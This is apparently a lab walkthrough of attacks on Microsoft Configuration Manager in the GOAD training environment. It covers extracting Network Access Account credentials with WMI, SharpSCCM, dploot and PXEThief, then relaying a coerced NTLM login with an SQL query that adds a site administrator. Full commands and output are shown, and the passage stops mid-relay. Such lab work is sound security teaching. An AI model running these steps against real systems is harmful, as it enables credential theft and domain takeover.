Microsoft Configuration Manager

Microsoft Configuration Manager is system management software developed by Microsoft. It was previously known as System Center Configuration Manager (SCCM). The software performs a number of tasks including software and operating system deployment, patch management, endpoint protection and inventory management.

This article will be looking at setting up a Configuration Manager lab, and looking at common vulnerabilities association with Configuration Manager.

For the lab setup, we will be using Orange Cyberdefences Game of Active Directory (GOAD) lab.


GOAD SCCM Configuration

The following setup instructions are for a Ubuntu 24.04 host. First, install some necessary packages.

sudo apt install virtualbox ansible python3-pip python3-venv ruby -y
sudo gem install winrm winrm-fs winrm-elevated

Then add a repository for vagrant, and install it.

wget -O- https://apt.releases.hashicorp.com/gpg | sudo gpg --dearmor -o /usr/share/keyrings/hashicorp-archive-keyring.gpg
echo "deb [signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list
sudo apt update && sudo apt install vagrant

Clone the GOAD repository from https://github.com/Orange-Cyberdefense/GOAD and check the install prerequisites have been met.

./goad.sh -t check -l SCCM -p virtualbox -m local
[✓] Task: check
[✓] Lab: SCCM
[✓] Provider: virtualbox
[✓] Method: local
[✓] folder ad/SCCM/providers/virtualbox found
[✓] Launch check : ./scripts/check.sh virtualbox local
[+] Enumerating virtulabox
  [✓] virtualbox is installed
  [✓] Vagrant was found in your PATH
  [✓] Your version of Vagrant (2.4.1) is supported
  [✓] The vagrant-reload plugin is currently installed
  [✓] You have more than 120GB of free space on your primary partition
  [✓] You have more than 24GB of ram
  [✓] python3 is installed
  [✓] python3 (3.12.3) is supported
  [✓] Checking if python3 env is ansible ready :
WARNING: Skipping /usr/lib/python3.12/dist-packages/argcomplete-3.1.4.dist-info due to invalid metadata entry 'name'
WARNING: Skipping /usr/lib/python3.12/dist-packages/argcomplete-3.1.4.dist-info due to invalid metadata entry 'name'
    [✓] ansible-core 2.16.3  is supported
WARNING: Skipping /usr/lib/python3.12/dist-packages/argcomplete-3.1.4.dist-info due to invalid metadata entry 'name'
    [✓] pywinrm is installed
  [✓] ansible is installed
  [✓] ansible-galaxy is installed
    [✓] ansible-galaxy collection community.windows installed
    [✓] ansible-galaxy collection community.general installed
    [✓] ansible-galaxy collection ansible.windows installed
  [✓] ansible-galaxy requirements ok
[✓] Check is ok, you can start the installation

Assuming that completes, the lab can be installed with;

./goad.sh -t install -l SCCM -p virtualbox -m local

My install failed half way through with an error similar to below.

fatal: [srv01]: FAILED! => {"attempts": 3, "changed": false, "elapsed": 2.2032366, "log": "=== Verbose logging started: 8/14/2024  6:26:29  Build type: SHIP UNICODE 5.00.10011.00  Calling process: C:\\Windows\\System32\\msiexec.exe ===\r\nMSI (c) (20:B4) [06:26:29:013]: Resetting cached policy values\r\nMSI (c) (20:B4) [06:26:29:013]: Machine policy value 'Debug' is 0\r\nMSI (c) (20:B4) [06:26:29:013]: ******* RunEngine:\r\n           ******* Product: C:\\Users\\vagrant\\AppData\\Local\\Temp\\ansible-moduletmp-133681155826084845-1316-1878243768\\msodbcsql.msi\r\n           ******* Action: \r\n           ******* CommandLine: **********\r\nMSI (c) (20:B4) [06:26:29:013]: Client-side and UI is none or basic: Running entire install on the server.\r\nMSI (c) (20:B4) [06:26:29:013]: Grabbed execution mutex.\r\nMSI (c) (20:B4) [06:26:29:013]: Cloaking enabled.\r\nMSI (c) (20:B4) [06:26:29:013]: Attempting to enable all disabled privileges before calling Install on Server\r\nMSI (c) (20:B4) [06:26:29:029]: Incrementing counter to disable shutdown.

To fix this, login to SCCM-MECM with the credentials dave/dragon, and install the following package;

http://aka.ms/vs/15/release/vc_redist.x64.exe

Rerun the install process, and it should then succeed;

PLAY RECAP ***************************************************************************************************************************************************
dc01                       : ok=2    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv01                      : ok=2    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=2    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
ws01                       : ok=2    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[✓] Command successfully executed
[✓] your lab : SCCM is successfully setup ! have fun ;)
Build in 108 minutes and 41 seconds.
/home/user/Documents/GOAD-main

Retrieving Network Access Account Credentials

Network access account credentials are typically used when a non domain joined system needs to be managed by SCCM. The account should not require any special privileges, however the account used is determined by an administrator, and as such may have more privileges than required.

WMI can be used to determine if Network Access Account credentials are being stored.

*Evil-WinRM* PS C:\Program Files (x86)> Get-WmiObject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"


__GENUS               : 2
__CLASS               : CCM_NetworkAccessAccount
__SUPERCLASS          : CCM_ComponentClientConfig
__DYNASTY             : CCM_Policy
__RELPATH             : CCM_NetworkAccessAccount.SiteSettingsKey=1
__PROPERTY_COUNT      : 8
__DERIVATION          : {CCM_ComponentClientConfig, CCM_Policy}
__SERVER              : CLIENT
__NAMESPACE           : ROOT\ccm\policy\Machine\ActualConfig
__PATH                : \\CLIENT\ROOT\ccm\policy\Machine\ActualConfig:CCM_NetworkAccessAccount.SiteSettingsKey=1
ComponentName         :
Enabled               :
NetworkAccessPassword : <PolicySecret Version="1"><![CDATA[F600000001000000D08C9DDF0115D1118C7A00C04FC297EB010000009FAF1566A8874F488C4C1DFCB04BE28000000000020000000000106600000001000020000000B766534583FB5C28AC4513A026F6E0480F57C89DE55C46A0A4152C6558
                        AD41D5000000000E8000000002000020000000CFD4277E10791D1246608136B1FD529DFB75E47A276AFCD95D7144EAB06F26F42000000048DC9D0F64FC3A1FB0BAE73102217C9E483DCD652ED48E139CFE9DB044C7D08A400000002EC45791904CD689F7C9D7BCD3CF6D119F4AC6803E9
                        723367EB4F3BF9646442F2A56879E2A0E32FD8749BF9F88E7CBBCD4359C5EEA0912C4FAA527BFF1BDDEB1]]></PolicySecret>
NetworkAccessUsername : <PolicySecret Version="1"><![CDATA[0601000001000000D08C9DDF0115D1118C7A00C04FC297EB010000009FAF1566A8874F488C4C1DFCB04BE2800000000002000000000010660000000100002000000037BC194AAE764B482365EB2BB38779CFD156DC6511AC1CA5763187C1FF
                        BA335B000000000E8000000002000020000000767B8CD53094D160ACA19DF489AB72F5963175F55560B535C4DF5804F5017007300000008255AF4F15A5C8CA2C5F053355666D88AE189FB90FD55F2AA959FE2CC92DC8B68880622003CAB7335C83A74B1E03E3604000000052384B9E8BF
                        60DBCD46750D393C2448B741D2D11F4059C1808A30352E8B526310047E84C5249566CC013E50D5D859109474CF4BDC119727E255640927E59D0C3]]></PolicySecret>
Reserved1             :
Reserved2             :
Reserved3             :
SiteSettingsKey       : 1
PSComputerName        : CLIENT

SharpSCCM Decryption

The actual username and password blobs are encrypted using the DPAPI. The easiest way to decrypt them is using a tool like SharpSCCM that automates the process. This requires local administrator credentials.

First, let’s upload SharpSCCM to the CLIENT system.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 192.168.60.13 -u bob -p marley
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\bob\Documents> hostname
CLIENT
*Evil-WinRM* PS C:\Users\bob\Documents> upload /home/kali/SharpSCCM.exe
Info: Uploading /home/kali/SharpSCCM.exe to C:\Users\bob\Documents\SharpSCCM.exe
Data: 1501184 bytes of 1501184 bytes copied
Info: Upload successful!

The following SharpSCCM command when then extract the plaintext credentials.

*Evil-WinRM* PS C:\Users\bob\Documents> .\SharpSCCM.exe local secrets -m disk

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Retrieving secret blobs from CIM repository

[+] Modifying permissions on registry key: SECURITY\Policy\Secrets\DPAPI_SYSTEM\CurrVal\
[+] Modifying permissions on registry key: SECURITY\Policy\PolEKList
[+] Reverting permissions on registry key: SECURITY\Policy\Secrets\DPAPI_SYSTEM\CurrVal\
[+] Reverting permissions on registry key: SECURITY\Policy\PolEKList

[+] Secret: DPAPI_SYSTEM
    full: FEAC041AF7BB53F075D3B1297F92D7AB4AD4DC3C7FAEFFFEB60D6A58CE3D2052ACD46201CA939403
     m/u: FEAC041AF7BB53F075D3B1297F92D7AB4AD4DC3C / 7FAEFFFEB60D6A58CE3D2052ACD46201CA939403

[+] SYSTEM master key cache:
    {2d646e92-80e4-423e-b2b9-994923083bf0}:928D8B7E438DC6CCD5CF105E73C7E5FABAD40792
    {7d07c85d-37f6-4300-8be0-5c5c60bc21d6}:E0886A2D0C4F8384FAD2AC59F574EB32A2C77E0A
    {bdfd60e1-036f-42ef-917f-d569f329eb07}:FE73A457220F49A819DE16D06DCE72CA580AB514
    {cf97801c-cb50-4710-8134-04b414c70e9d}:CD0271B161D6FED537E0B9639A37B62A0353FFFC
    {2898a327-0ec1-4fcc-af1d-3451c5febd7b}:405B7821B15C9DB4CDB0E7EBF88B1AD6E38C3C05
    {6615af9f-87a8-484f-8c4c-1dfcb04be280}:7DB6DFAA78147C16FEE4429E0E15DBC900DF0343
    {8ede9fcc-0748-4191-973f-71fbd748fa20}:A654CEC664CC2AB952D49F9986CC235D48B7F9F7

[+] Decrypting 2 network access account secrets

    NetworkAccessUsername: sccm.lab\sccm-naa
    NetworkAccessPassword: 123456789

    NetworkAccessUsername: sccm.lab\sccm-naa
    NetworkAccessPassword: 123456789

[+] Decrypting 1 other secrets

    Plaintext secret: <PolicyAction PolicyActionType="WMI-XML">
        <instance class="CCM_NetworkAccessAccount">
                <property name="SiteSettingsKey" type="19">
                        <value>
                                <![CDATA[1]]>
                        </value>
                </property>
                <property name="NetworkAccessUsername" type="8" secret="1">
                        <value>
                                <![CDATA[89130000DC04B850A63B412D691584A9E3F46D2F0C4342C7EF9387DDD5ADCF95AF1E09423ED7DB020E0473D71400000024000000280000000366000000000000524BE4593A1C9EF8F1156B58376920A6E694F13E0D5D6E4B87982A4B6769C3ABB091802F3A8D19EC00000000]]>
                        </value>
                </property>
                <property name="NetworkAccessPassword" type="8" secret="1">
                        <value>
                                <![CDATA[89130000D99D49B50150755B3833B6F3E0A02CEDF665033FA8753993D2E32FD9823807C62F55AA0C89A46D51140000001400000018000000036600000000000071BBA43AA27B3C0A3EF201069358191D0ABA2D1B935A309C2050726F]]>
                        </value>
                </property>
                <property name="Reserved1" type="8">
                        <value>
                        </value>
                </property>
                <property name="Reserved2" type="8">
                        <value>
                        </value>
                </property>
                <property name="Reserved3" type="8">
                        <value>
                        </value>
                </property>
        </instance>
</PolicyAction>

[+] Completed execution in 00:00:01.8102600

dploot Decryption

SCCM credentials can also be extracted from a network adjacent host using dploot. This tool can be installed in Kali using the python3-dploot package.

dploot sccm -u bob -p marley 192.168.60.13 -debug
[+] Connecting to 192.168.60.13
[+] Authenticating with bob through NTLM
[*] Connected to 192.168.60.13 as \bob (admin)

[*] Triage SYSTEM masterkeys

[+] Found SYSTEM system MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\2d646e92-80e4-423e-b2b9-994923083bf0
[+] Found SYSTEM system MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\7d07c85d-37f6-4300-8be0-5c5c60bc21d6
[+] Found SYSTEM system MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\bdfd60e1-036f-42ef-917f-d569f329eb07
[+] Found SYSTEM system MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\cf97801c-cb50-4710-8134-04b414c70e9d
[+] Found SYSTEM user MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\User\2898a327-0ec1-4fcc-af1d-3451c5febd7b
[+] Found SYSTEM user MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\User\6615af9f-87a8-484f-8c4c-1dfcb04be280
[+] Found SYSTEM user MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\User\8ede9fcc-0748-4191-973f-71fbd748fa20
{2d646e92-80e4-423e-b2b9-994923083bf0}:928d8b7e438dc6ccd5cf105e73c7e5fabad40792
{7d07c85d-37f6-4300-8be0-5c5c60bc21d6}:e0886a2d0c4f8384fad2ac59f574eb32a2c77e0a
{bdfd60e1-036f-42ef-917f-d569f329eb07}:fe73a457220f49a819de16d06dce72ca580ab514
{cf97801c-cb50-4710-8134-04b414c70e9d}:cd0271b161d6fed537e0b9639a37b62a0353fffc
{2898a327-0ec1-4fcc-af1d-3451c5febd7b}:405b7821b15c9db4cdb0e7ebf88b1ad6e38c3c05
{6615af9f-87a8-484f-8c4c-1dfcb04be280}:7db6dfaa78147c16fee4429e0e15dbc900df0343
{8ede9fcc-0748-4191-973f-71fbd748fa20}:a654cec664cc2ab952d49f9986cc235d48b7f9f7

[*] Triage SCCM Secrets

[+] Looking for NAA Credentials from OBJECTS.DATA file
[+] Found NAA Credentials from OBJECTS.DATA file
[+] Found NAA Credentials from OBJECTS.DATA file
[+] Looking for task sequences secret from OBJECTS.DATA file
[+] Looking for collection variables from OBJECTS.DATA file
[NAA Account]
        Username:       sccm.lab\sccm-naa
        Password:       123456789
[NAA Account]
        Username:       sccm.lab\sccm-naa
        Password:       123456789


Retrieving Credentials using PXE

PXE (Preboot eXecution Environment) boot is a protocol used to boot a computer over a network before the operating system has loaded. This is commonly used in enterprise environments to deploy new operating systems.

PXEThief can be used to download a PXE image and extract any stored credentials. For automatic credential decryption to work, this needs to be executed from a Windows host.

python pxethief.py 2 192.168.60.11
 ________  ___    ___ _______  _________  ___  ___  ___  _______   ________
|\   __  \|\  \  /  /|\  ___ \|\___   ___\\  \|\  \|\  \|\  ___ \ |\  _____\
\ \  \|\  \ \  \/  / | \   __/\|___ \  \_\ \  \\\  \ \  \ \   __/|\ \  \__/
 \ \   ____\ \    / / \ \  \_|/__  \ \  \ \ \   __  \ \  \ \  \_|/_\ \   __\
  \ \  \___|/     \/   \ \  \_|\ \  \ \  \ \ \  \ \  \ \  \ \  \_|\ \ \  \_|
   \ \__\  /  /\   \    \ \_______\  \ \__\ \ \__\ \__\ \__\ \_______\ \__\
    \|__| /__/ /\ __\    \|_______|   \|__|  \|__|\|__|\|__|\|_______|\|__|
          |__|/ \|__|

[+] Generating and downloading encrypted media variables file from MECM server located at 192.168.60.11
[+] Using interface: \Device\NPF_{B4C18489-2E87-4544-96C4-933DF581E3C2} - Intel(R) PRO/1000 MT Desktop Adapter #2
[+] Targeting user-specified host: 192.168.60.11

[+] Asking ConfigMgr for location to download the media variables and BCD files...

Begin emission:
WARNING: Mac address to reach destination not found. Using broadcast.
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets

[!] Variables File Location: \SMSTemp\2024.08.15.02.31.30.0001.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.var
[!] BCD File Location: \SMSTemp\2024.08.15.02.31.30.04.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.bcd
[!] Blank password on PXE boot found!
[+] Use this command to grab the files:
tftp -i 192.168.60.11 GET "\SMSTemp\2024.08.15.02.31.30.0001.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.var" "2024.08.15.02.31.30.0001.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.var"
tftp -i 192.168.60.11 GET "\SMSTemp\2024.08.15.02.31.30.04.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.bcd" "2024.08.15.02.31.30.04.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.bcd"
[!] Attempting automatic exploitation. Note that this will require the default tftp client to be installed (on Windows, this can be found under Windows Features), and this will be run with os.system
tftp: can't write to local file '2024.08.15.02.31.30.0001.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.var'
[+] Media variables file to decrypt: 2024.08.15.02.31.30.0001.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.var
[+] Password bytes provided: 0xf8ff77006f00c5ffa9ff5800c2ffa5ff54000b00
[+] Successfully decrypted media variables file with the provided password!
[!] Writing media variables to variables.xml
[!] Writing _SMSTSMediaPFX to P01_{F62083AC-5938-4C59-8A8E-26D61A_SMSTSMediaPFX.pfx. Certificate password is {F62083AC-5938-4C59-8A8E-26D61A
[+] Identifying Management Point URL from media variables (Subsequent requests may fail if DNS does not resolve!)
[+] Management Point URL set to: http://MECM.sccm.lab
[+] Successfully Imported PFX File into Windows Certificate Store!
[+] Generating Client Authentication headers using PFX File...
[+] CCMClientID Signature Generated
[+] CCMClientTimestamp Signature Generated
[+] ClientToken Signature Generated
[+] Retrieving x64UnknownMachineGUID from MECM MP...
[+] Requesting policy assignments from MP...
[+] 47 policy assignment URLs found!
[+] Requesting Network Access Account Configuration from: http://MECM.sccm.lab/SMS_MP/.sms_pol?{3593b738-9a66-4fef-9bef-aae3e2f77a61}.2_00
[+] Requesting Task Sequence Configuration from: http://MECM.sccm.lab/SMS_MP/.sms_pol?P0120001-P0100008-6F6BCC28.1_00

[+] Decrypting Network Access Account Configuration
[+] Extracting password from Decrypted Network Access Account Configuration

[!] Network Access Account Username: 'sccm.lab\sccm-naa'
[!] Network Access Account Password: '123456789'
[!] Network Access Account Username: 'sccm.lab\sccm-naa'
[!] Network Access Account Password: '123456789'

[+] Decrypting Task Sequence Configuration

[!] Successfully Decrypted TS_Sequence XML Blob in Task Sequence 'Install_win10_OS_image'!
[+] Attempting to automatically identify credentials in Task Sequence 'Install_win10_OS_image':

[!] Possible credential fields found!

In TS Step "Apply Windows Settings":
OSDRegisteredUserName - Administrator
OSDLocalAdminPassword - EP+xh7Rk6j90

In TS Step "Apply Network Settings":
OSDJoinAccount - sccm.lab\sccm-naa
OSDJoinPassword - 123456789

[+] Cleaning up
Traceback (most recent call last):

Relay Attacks

The GOAD SCCM environment has the SCCM MSSQL database on a separate host. We can relay a connection from the system where MECM is installed to the MSSQL database to add a new administrative user. First, use sccmhunter to gather some site details we will be needing…

python3 sccmhunter.py find -u carol -p SCCMftw -d sccm.lab -dc-ip 192.168.60.10       
SCCMHunter v1.0.5 by @garrfoster
[15:12:04] INFO     [*] Checking for System Management Container.                                                                                                                                                                              
[15:12:04] INFO     [+] Found System Management Container. Parsing DACL.                                                                                                                                                                       
[15:12:04] INFO     [+] Found 1 computers with Full Control ACE                                                                                                                                                                                
[15:12:04] INFO     [*] Querying LDAP for published Sites and Management Points                                                                                                                                                                
[15:12:04] INFO     [+] Found 1 Management Points in LDAP.                                                                                                                                                                                     
[15:12:04] INFO     [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'                                                                                                                                                    
[15:12:04] INFO     [+] Found 11 principals that contain the string 'SCCM' or 'MECM'.        

python3 sccmhunter.py show -all                                                 
SCCMHunter v1.0.5 by @garrfoster
[15:11:46] INFO     [+] Showing SiteServers Table                                                                                                                                                                                              
[15:11:46] INFO     +---------------+------------+-------+-----------------+--------------+---------------+----------+---------+                                                                                                               
                    | Hostname      | SiteCode   | CAS   | SigningStatus   | SiteServer   | SMSProvider   | Config   | MSSQL   |                                                                                                               
                    +===============+============+=======+=================+==============+===============+==========+=========+                                                                                                               
                    | mecm.sccm.lab |            |       |                 | True         |               |          |         |                                                                                                               
                    +---------------+------------+-------+-----------------+--------------+---------------+----------+---------+                                                                                                               
[15:11:46] INFO     [+] Showing ManagementPoints Table                                                                                                                                                                                         
[15:11:46] INFO     +---------------+------------+-----------------+                                                                                                                                                                           
                    | Hostname      | SiteCode   | SigningStatus   |                                                                                                                                                                           
                    +===============+============+=================+                                                                                                                                                                           
                    | mecm.sccm.lab | P01        |                 |                                                                                                                                                                           
                    +---------------+------------+-----------------+                                                                                                                                                                           
[15:11:46] INFO     [+] Showing USERS Table                                                                                                                                                                                                    
[15:11:46] INFO     +------------------+------------------+------------------+------------------------------+---------------------+                                                                                                            
                    | cn               | name             | sAMAAccontName   | servicePrincipalName         | description         |                                                                                                            
                    +==================+==================+==================+==============================+=====================+                                                                                                            
                    | sccm-sql         | sccm-sql         | sccm-sql         | MSSQLSvc/MSSQL.sccm.lab      | sql service         |                                                                                                            
                    |                  |                  |                  | MSSQLSvc/MSSQL.sccm.lab:1433 |                     |                                                                                                            
                    +------------------+------------------+------------------+------------------------------+---------------------+                                                                                                            
                    | sccm-naa         | sccm-naa         | sccm-naa         |                              | naa account         |                                                                                                            
                    +------------------+------------------+------------------+------------------------------+---------------------+                                                                                                            
                    | sccm-account-da  | sccm-account-da  | sccm-account-da  |                              | sccm account        |                                                                                                            
                    +------------------+------------------+------------------+------------------------------+---------------------+                                                                                                            
                    | sccm-client-push | sccm-client-push | sccm-client-push |                              | client push account |                                                                                                            
                    +------------------+------------------+------------------+------------------------------+---------------------+                                                                                                            
[15:11:46] INFO     [+] Showing GROUPS Table                                                                                                                                                                                                   
[15:11:46] INFO     +---------------------+---------------------+---------------------+--------------------------------------------+---------------+                                                                                           
                    | cn                  | name                | sAMAAccontName      | member                                     | description   |                                                                                           
                    +=====================+=====================+=====================+============================================+===============+                                                                                           
                    | SCCM-Managed-Device | SCCM-Managed-Device | SCCM-Managed-Device | CN=CLIENT,CN=Computers,DC=sccm,DC=lab      |               |                                                                                           
                    |                     |                     |                     | CN=MECM,CN=Computers,DC=sccm,DC=lab        |               |                                                                                           
                    |                     |                     |                     | CN=MSSQL,CN=Computers,DC=sccm,DC=lab       |               |                                                                                           
                    |                     |                     |                     | CN=DC,OU=Domain Controllers,DC=sccm,DC=lab |               |                                                                                           
                    +---------------------+---------------------+---------------------+--------------------------------------------+---------------+                                                                                           
                    | SCCM-Admins         | SCCM-Admins         | SCCM-Admins         | CN=dave,CN=Users,DC=sccm,DC=lab            |               |                                                                                           
                    +---------------------+---------------------+---------------------+--------------------------------------------+---------------+                                                                                           
                    | SCCM-Site-Server    | SCCM-Site-Server    | SCCM-Site-Server    | CN=MECM,CN=Computers,DC=sccm,DC=lab        |               |                                                                                           
                    +---------------------+---------------------+---------------------+--------------------------------------------+---------------+                                                                                           
[15:11:46] INFO     [+] Showing COMPUTERS Table                                                                                                                                                                                                
[15:11:46] INFO     +---------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+                                                                               
                    | Hostname      | SiteCode   | SigningStatus   | SiteServer   | ManagementPoint   | DistributionPoint   | SMSProvider   | WSUS   | MSSQL   |                                                                               
                    +===============+============+=================+==============+===================+=====================+===============+========+=========+                                                                               
                    | mecm.sccm.lab |            |                 |              |                   |                     |               |        |         |                                                                               
                    +---------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+   

The main thing we need from this output is the site code, which we can see is P01.

Next, use sccmhunter.py to create a MSSQL command that we will be relaying.

python3 sccmhunter.py mssql -u carol -p SCCMftw -d sccm.lab -dc-ip 192.168.60.10 -tu carol -sc PO1 -stacked
/home/kali/.local/lib/python3.11/site-packages/pandas/core/arrays/masked.py:60: UserWarning: Pandas requires version '1.3.6' or newer of 'bottleneck' (version '1.3.5' currently installed).
  from pandas.core import (
SCCMHunter v1.0.5 by @garrfoster
[03:46:01 PM] INFO     [*] Resolving carol SID...                                                                                                                                                                                                                
[03:46:01 PM] INFO     [*] Converted carol SID to 0x010500000000000515000000FCDE497C9CAFE5E38944A6FA5A040000                                                                                                                                                     
[03:46:01 PM] INFO     [*] Use the following to add carol as a Site Server Admin.                                                                                                                                                                                

DECLARE @AdminID INT; USE CM_PO1; INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite) SELECT 0x010500000000000515000000FCDE497C9CAFE5E38944A6FA5A040000, 'SCCMLAB\carol', 0, 0, '', '', '', '', 'PO1' WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol' ); SET @AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'); INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) SELECT @AdminID, RoleID, ScopeID, ScopeTypeID FROM (VALUES  ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1) ) AS V(RoleID, ScopeID, ScopeTypeID) WHERE NOT EXISTS ( SELECT 1 FROM RBAC_ExtendedPermissions  WHERE AdminID = @AdminID  AND RoleID = V.RoleID  AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID );

Start NTLMRelayx using the SQL query sccmhunter supplied to us;

sudo impacket-ntlmrelayx -smb2support -ts -t mssql://192.168.60.12 -q "DECLARE @AdminID INT; USE CM_P01; INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite) SELECT 0x010500000000000515000000FCDE497C9CAFE5E38944A6FA5A040000, 'SCCMLAB\carol', 0, 0, '', '', '', '', 'P01' WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol' ); SET @AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'); INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) SELECT @AdminID, RoleID, ScopeID, ScopeTypeID FROM (VALUES  ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1) ) AS V(RoleID, ScopeID, ScopeTypeID) WHERE NOT EXISTS ( SELECT 1 FROM RBAC_ExtendedPermissions  WHERE AdminID = @AdminID  AND RoleID = V.RoleID  AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID );"

Run coercer to get the SCCM-MECM host to connect to our attacker system.

sudo coercer coerce -t 192.168.60.11 -l 192.168.60.100 -u carol -p SCCMftw --always-continue
       ______
      / ____/___  ___  _____________  _____
     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v2.4.3
    \____/\____/\___/_/   \___/\___/_/       by @podalirius_

[info] Starting coerce mode
[info] Scanning target 192.168.60.11
[*] DCERPC portmapper discovered ports: 49664,49665,49666,49667,49668,49670,49671,49673,5040,49685
[+] DCERPC port '49670' is accessible!
   [+] Successful bind to interface (12345678-1234-ABCD-EF00-0123456789AB, 1.0)!
      [!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\192.168.60.100\x00') 
      [!] (RPC_S_INVALID_NET_ADDR) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\192.168.60.100\x00') 
[+] SMB named pipe '\PIPE\eventlog' is accessible!
   [+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
      [!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\192.168.60.100\jPITGBNj\aa') 
[+] SMB named pipe '\PIPE\lsarpc' is accessible!
   [+] Successful bind to interface (c681d488-d850-11d0-8c52-00c04fd90f7e, 1.0)!
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\192.168.60.100\UpPW5sxg\file.txt\x00') 
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\192.168.60.100\2zdECnVB\\x00') 
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\192.168.60.100\T5c6XM4s\x00') 
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\192.168.60.100@80/kWd\share\file.txt\x00') 
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\192.168.60.100\tBzISKNI\file.txt\x00') 

Running this should result in our query being relayed and executed.

sudo impacket-ntlmrelayx -smb2support -ts -t mssql://192.168.60.12 -q "DECLARE @AdminID INT; USE CM_P01; INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite) SELECT 0x010500000000000515000000FCDE497C9CAFE5E38944A6FA5A040000, 'SCCMLAB\carol', 0, 0, '', '', '', '', 'P01' WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol' ); SET @AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'); INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) SELECT @AdminID, RoleID, ScopeID, ScopeTypeID FROM (VALUES  ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1) ) AS V(RoleID, ScopeID, ScopeTypeID) WHERE NOT EXISTS ( SELECT 1 FROM RBAC_ExtendedPermissions  WHERE AdminID = @AdminID  AND RoleID = V.RoleID  AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID );"
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[2024-08-17 16:12:15] [*] Protocol Client RPC loaded..
[2024-08-17 16:12:15] [*] Protocol Client SMTP loaded..
[2024-08-17 16:12:15] [*] Protocol Client HTTP loaded..
[2024-08-17 16:12:15] [*] Protocol Client HTTPS loaded..
[2024-08-17 16:12:15] [*] Protocol Client MSSQL loaded..
[2024-08-17 16:12:15] [*] Protocol Client DCSYNC loaded..
[2024-08-17 16:12:15] [*] Protocol Client SMB loaded..
[2024-08-17 16:12:15] [*] Protocol Client LDAP loaded..
